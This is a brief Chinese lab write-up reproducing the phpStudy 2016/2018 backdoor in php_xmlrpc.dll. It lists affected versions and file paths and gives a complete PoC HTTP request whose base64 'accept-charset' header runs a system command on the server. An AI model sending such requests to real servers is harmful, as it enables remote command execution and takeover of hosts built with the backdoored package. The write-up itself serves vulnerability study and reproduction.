0x01 漏洞简介
phpstudy是一个对初学php的人们很有帮助的工具,他集成的环境可以给初学者带来很多便捷之处,但是某些版本存在后门,如果服务器使用存在后门的phpstudy搭建,这样可以直接被人家getshell
0x02 影响版本
- phpstudy 2016版php-5.4
- phpstudy 2018版php-5.2.17
- phpstudy 2018版php-5.4.45
0x03 后门位置
后门代码存在于\ext\php_xmlrpc.dll模块中
phpStudy2016和phpStudy2018自带php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
0x04 环境搭建
使用带后门的phpstudy进行搭建在www目录写一个index.pnp
<?php
echo “helloworld!”;
?>
0x05 漏洞复现
访问这个页面进行抓包将修改一下内容
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 //字段需要进行base64编码
Accept-Encoding: gzip,deflate //deflate前面的空格去掉
POC
GET / HTTP/1.1
Host: 192.168.4.113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
Content-Length: 2